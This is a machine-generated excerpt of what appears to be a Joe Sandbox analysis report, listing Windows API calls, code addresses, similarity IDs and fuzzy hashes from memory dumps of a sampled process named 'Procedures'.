                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                                    • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EB9A5D
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EB9A72
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EB9ABA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00EB9AF0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2864067406-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E21AF4
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E631F9
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00E63203
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00E6320E
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 4127811313-2063206799
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E4508E,?,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002), ref: 00E450FD
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E45110
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00E4508E,?,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002,00000000), ref: 00E45133
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                    • Opcode ID: f0ce37b9800839750dd4e54ab982e1a5a01486fbfd5125d242b63bee98cacb0a
                                                                                                                                                                                                                                                                                                    • Instruction ID: da4a3c108cb241baf5ee1be17b2e48d33d0cd4a69f5e11d58eca0232993ca532
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0ce37b9800839750dd4e54ab982e1a5a01486fbfd5125d242b63bee98cacb0a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0C231A05608BFDB149F95EC49BAEBFF8EF04716F0011A9F809B2261DB359E55CA90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32 ref: 00E7E785
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7E797
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00E7E7BD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                                    • Opcode ID: 540bde48a6daa7082b79f080add3603326ff7c7992291e01f4e83d179145a571
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2eb59fab53a59cfabdbe06d45edb3c1cd6694d130ee0bef1734c813ad980dbea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 540bde48a6daa7082b79f080add3603326ff7c7992291e01f4e83d179145a571
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCE02BB080B611DFD7355B644C48EEB35186F28704F10A2DAFD0AF2250EB30CC48C694
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26610
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E26622
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26635
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                    • Opcode ID: 88f63662191a8600fe108e139da555ec676fbb021a784af885287c0c7f699b4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 27f01e90570391edbf8aa8414e180fc8233c0ce8aeb5a9dc66a9d92c28b8080d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88f63662191a8600fe108e139da555ec676fbb021a784af885287c0c7f699b4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AD05B356177325B4232372A7C189CF7B149FD1F157051325F800B2164EF64CD16C5D8
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E935C4
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00E93646
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E9365C
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9366D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9367F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a188a73eed4fc65f093ab3c9f4a5ba638e6379889d64da9fbe12a86c7c1b823
                                                                                                                                                                                                                                                                                                    • Instruction ID: 83121555a14dfc55b6ddbe01199498f5795273143ba6e408824e8a3d9907000a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a188a73eed4fc65f093ab3c9f4a5ba638e6379889d64da9fbe12a86c7c1b823
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95B15E72E00219ABDF15DFA4DC85EDEBBBDEF48314F0051A6F609F6151EA309B448B61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00EAAE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EAAE95
                                                                                                                                                                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EAAEC8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EAB09D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b80cb8a566a3f5722856259befe236cce6bf210869816119eca13ac7c33cf48b
                                                                                                                                                                                                                                                                                                    • Instruction ID: a6b8ab300af663f221a27ebbebf0f34fa891cdb7246e1739e92c25a0d306937a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80cb8a566a3f5722856259befe236cce6bf210869816119eca13ac7c33cf48b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28A1B071A04311AFE720DF24C886B2AB7E5AF48714F14985DF599AB3D2DB71EC40CB81
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC505
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EAC560
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EAC5C3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00EAC606
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAC613
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: bb416e12a281ddf2ce5f52533678cf511bc78f417d4597064baa6017ae2d1e90
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9f60a0973940c3dae290f5ad225ad60a604da7bc27ffd40464a8e4ef5140b981
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb416e12a281ddf2ce5f52533678cf511bc78f417d4597064baa6017ae2d1e90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C261A131608241AFD714DF14C890E6ABBE5FF89308F54955CF09AAB292DB31FD46CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E8D7CD,?), ref: 00E8E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E8D7CD,?), ref: 00E8E72D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8EAB0: GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00E8ED8A
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E8EDC3
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8EF02
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8EF1A
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E8EF67
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a13ec089ae394d81c5caba503c6976c2cb8f53fd53aee05a5b54d949fe19e95
                                                                                                                                                                                                                                                                                                    • Instruction ID: c8f3fbeed1db6ea1dfdd2a059b17dbd0a2da44b6df55fcd312abd07e60654c0c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a13ec089ae394d81c5caba503c6976c2cb8f53fd53aee05a5b54d949fe19e95
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F25163B21083849BC725EB64DC819DBB3ECAF85354F00192EF68DE3191EF71A6888756
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00E89534
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00E895A5
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00E89604
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E89677
                                                                                                                                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E896A2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 387e4b8d4046c9b0338e8134820cb407155c688b0f765e25e1b9b54237d7135e
                                                                                                                                                                                                                                                                                                    • Instruction ID: bcbdd613c57856494761c422dcfea8ae2af31095fbf908f4e130a7e7d26decca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 387e4b8d4046c9b0338e8134820cb407155c688b0f765e25e1b9b54237d7135e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF514BB5A00219EFCB14DF58C884EAAB7F8FF88314B158559E91AEB310E730E911CF90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E995F3
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E9961F
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E99677
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E9969C
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E996A4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EA999D
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EA9A2D
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EA9A49
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EA9A8F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EA9AAF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E91A02,?,7529E610), ref: 00E3F9F1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E80354,00000000,00000000,?,?,00E91A02,?,7529E610,?,00E80354), ref: 00E3FA18
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EB766B
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00EB7682
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EB76AB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E9B5BE,00000000,00000000), ref: 00EB76D0
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EB76FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
APIs
• GetWindowRect.USER32(?,?), ref: 00E82262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00E8230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00E82316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00E82327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E8232F
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
